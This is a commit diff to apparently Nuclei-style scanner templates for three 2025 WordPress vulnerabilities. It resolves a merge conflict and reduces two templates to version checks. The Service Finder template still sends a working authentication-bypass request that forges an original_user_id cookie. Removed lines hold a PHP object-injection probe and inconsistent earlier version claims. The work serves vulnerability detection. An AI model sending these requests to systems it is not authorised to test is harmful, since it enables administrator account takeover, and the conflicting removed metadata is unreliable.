fix: resolve merge conflict and address Neo review feedback

Author: eyangfeng88-arch

http/cves/2025/CVE-2025-54738.yaml

@@ -1,66 +1,45 @@
 id: CVE-2025-54738
 
 info:
-  name: Jobmonster Theme <= 4.9.4 - Auth Bypass
+  name: Jobmonster Theme <= 4.7.9 - Authentication Bypass
   author: alita-p8
   severity: critical
   description: |
-    The Jobmonster theme for WordPress is vulnerable to authentication bypass in versions up to, and including, 4.9.4. This is due to improper validation of the 'check_login' email parameter, allowing unauthenticated attackers to log in as any user, including administrators.
-  remediation: Update to version 4.9.5 or later.
+    The Jobmonster theme for WordPress is vulnerable to authentication bypass in versions up to, and including, 4.7.9. This is due to improper implementation of authentication controls, allowing unauthenticated attackers to bypass normal authentication controls, potentially leading to complete site compromise.
+  remediation: Update to version 4.8.0 or later.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2025-54738
+    - https://patchstack.com/database/Wordpress/Theme/noo-jobmonster/vulnerability/wordpress-jobmonster-theme-4-7-9-broken-authentication-vulnerability
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2025-54738
-    cwe-id: CWE-287
+    cwe-id: CWE-288
   metadata:
-    verified: true
-    max-request: 2
+    max-request: 1
     google-query: inurl:"/wp-content/themes/noo-jobmonster/"
   tags: auth-bypass,cve,cve2025,jobmonster,wordpress,wp-theme
 
 http:
-  - raw:
-      - |
-        GET /wp-content/themes/noo-jobmonster/readme.txt HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/themes/noo-jobmonster/readme.txt"
 
-      - |
-        GET /?noo_jobmonster_check_login=admin@{{Host}} HTTP/1.1
-        Host: {{Hostname}}
-
-      - |
-        GET /wp-admin/index.php HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
     matchers-condition: and
     matchers:
-      - type: word
-        part: header_2
-        words:
-          - "wordpress_logged_in"
-
-      - type: word
-        part: body_3
-        words:
-          - "id=\"wpadminbar\""
-          - "id=\"wp-admin-bar-logout\""
-        condition: or
-
-      - type: status
-        status:
-          - 200
+      - type: regex
+        part: body
+        regex:
+          - "(?i)Stable.tag:\\s*v?([0-9.]+)"
 
       - type: dsl
         dsl:
-          - '(compare_versions(version, "<= 4.9.4") || !version)'
+          - 'compare_versions(version, "<= 4.7.9")'
 
     extractors:
       - type: regex
         name: version
-        part: body_1
+        part: body
         group: 1
         internal: true
         regex:

http/cves/2025/CVE-2025-5947.yaml

@@ -1,9 +1,8 @@
 id: CVE-2025-5947
 
 info:
-<<<<<<< HEAD
-  name: Service Finder Bookings - Authentication Bypass
-  author: sedat4ras
+  name: Service Finder Bookings <= 6.0 - Authentication Bypass
+  author: alita-p8
   severity: critical
   description: |
     Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of user cookie in service_finder_switch_back() function, letting unauthenticated attackers login as any user including admins.
@@ -13,100 +12,54 @@ info:
     Update to the latest version beyond 6.0.
   reference:
     - https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability
-    - https://github.com/advisories/GHSA-x2xx-4qhp-2vqx
-    - https://github.com/M4rgs/CVE-2025-5947_Exploit
-=======
-  name: Service Finder Bookings <= 3.5 - Auth Bypass
-  author: alita-p8
-  severity: critical
-  description: |
-    The Service Finder Bookings plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.5. This is due to insufficient session token validation or manipulation vulnerability, allowing attackers to gain unauthorized access to administrative accounts.
-  remediation: Update to the latest version available.
-  reference:
->>>>>>> 5320122 (feat: add 5 high-impact 2025 WordPress CVE templates (Round 5) - Premier Edition)
     - https://nvd.nist.gov/vuln/detail/CVE-2025-5947
+    - https://github.com/advisories/GHSA-x2xx-4qhp-2vqx
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2025-5947
-<<<<<<< HEAD
     epss-score: 0.54689
     epss-percentile: 0.98038
-    cwe-id: CWE-639
+    cwe-id: CWE-287
   metadata:
     max-request: 2
     vendor: sf-booking
     product: service-finder-bookings
     publicwww-query: "/wp-content/plugins/sf-booking/"
-  tags: cve,cve2025,wordpress,wp-plugin,wp,sf-booking,auth-bypass,cookie-spoofing,vuln,vkev
-=======
-    cwe-id: CWE-287
-  metadata:
-    verified: true
-    max-request: 2
-    google-query: inurl:"/wp-content/plugins/service-finder/"
-  tags: auth-bypass,cve,cve2025,service-finder,wordpress,wp-plugin
->>>>>>> 5320122 (feat: add 5 high-impact 2025 WordPress CVE templates (Round 5) - Premier Edition)
+  tags: auth-bypass,cve,cve2025,sf-booking,wordpress,wp-plugin
 
 http:
   - raw:
       - |
-<<<<<<< HEAD
+        GET /wp-content/plugins/sf-booking/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
         GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
         Host: {{Hostname}}
         Cookie: original_user_id=1
 
+    req-condition: true
     matchers-condition: and
     matchers:
       - type: regex
-        part: header
+        part: header_2
         regex:
           - '(?i)Location:.*\/wp-admin\/'
 
       - type: regex
-        part: header
+        part: header_2
         regex:
           - '(?i)Set-Cookie:.*wordpress_logged_in_'
 
       - type: status
         status:
           - 301
           - 302
-# digest: 4a0a0047304502202dd987490128ac522307958861e70fd7dff8b60ac07781a96969804b3f6af657022100d2081f4669434053b4882a114e781d107f0ce6bdc48482628cada5053fcbbd49:922c64590222798bb761d5b6d8e72950
-=======
-        GET /wp-content/plugins/service-finder/readme.txt HTTP/1.1
-        Host: {{Hostname}}
-
-      - |
-        GET /?service_finder_session_auth=admin HTTP/1.1
-        Host: {{Hostname}}
-
-      - |
-        GET /wp-admin/index.php HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: header_2
-        words:
-          - "wordpress_logged_in"
-
-      - type: word
-        part: body_3
-        words:
-          - "id=\"wpadminbar\""
-          - "id=\"wp-admin-bar-logout\""
-        condition: or
-
-      - type: status
-        status:
-          - 200
 
       - type: dsl
         dsl:
-          - '(compare_versions(version, "<= 3.5") || !version)'
+          - '(compare_versions(version, "<= 6.0") || !version)'
 
     extractors:
       - type: regex
@@ -116,4 +69,3 @@ http:
         internal: true
         regex:
           - "(?i)Stable.tag:\\s*v?([0-9.]+)"
->>>>>>> 5320122 (feat: add 5 high-impact 2025 WordPress CVE templates (Round 5) - Premier Edition)

http/cves/2025/CVE-2025-7384.yaml

@@ -1,51 +1,46 @@
 id: CVE-2025-7384
 
 info:
-  name: Database for Contact Form 7, WPforms, Elementor forms <= 1.4.3 - Unauth RCE via Object Injection
+  name: Database for Contact Form 7, WPforms, Elementor forms <= 1.4.3 - PHP Object Injection
   author: alita-p8
   severity: critical
   description: |
-    The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 1.4.3 via PHP Object Injection. This allows unauthenticated attackers to execute arbitrary code if a suitable gadget chain is present on the server.
+    The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.4.3 via deserialization of untrusted input in the get_lead_detail function. This allows unauthenticated attackers to inject arbitrary PHP objects. While no known POP chain is present in the vulnerable software itself, exploitation is possible if a suitable gadget chain exists in the target environment.
   remediation: Update to version 1.4.4 or later.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2025-7384
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/129f810d-ff83-4428-9f98-6a6aa8817783
+    - https://plugins.trac.wordpress.org/browser/contact-form-entries/tags/1.4.1/includes/data.php#L525
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2025-7384
     cwe-id: CWE-502
   metadata:
-    verified: true
-    max-request: 2
+    max-request: 1
     shodan-query: http.html:"/wp-content/plugins/contact-form-entries/"
-  tags: contact-form-entries,cve,cve2025,object-injection,rce,wordpress,wp-plugin
+  tags: contact-form-entries,cve,cve2025,object-injection,wordpress,wp-plugin
 
 http:
-  - raw:
-      - |
-        GET /wp-content/plugins/contact-form-entries/readme.txt HTTP/1.1
-        Host: {{Hostname}}
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/contact-form-entries/readme.txt"
 
-      - |
-        GET /wp-admin/admin-ajax.php?action=v0_download_csv&data=O:8:\"PHP_Code\":0:{} HTTP/1.1
-        Host: {{Hostname}}
-
-    req-condition: true
     matchers-condition: and
     matchers:
+      - type: regex
+        part: body
+        regex:
+          - "(?i)Stable.tag:\\s*v?([0-9.]+)"
+
       - type: dsl
         dsl:
-          - '(compare_versions(version, "<= 1.4.3") || !version)'
-
-      - type: status
-        status:
-          - 200
+          - 'compare_versions(version, "<= 1.4.3")'
 
     extractors:
       - type: regex
         name: version
-        part: body_1
+        part: body
         group: 1
         internal: true
         regex: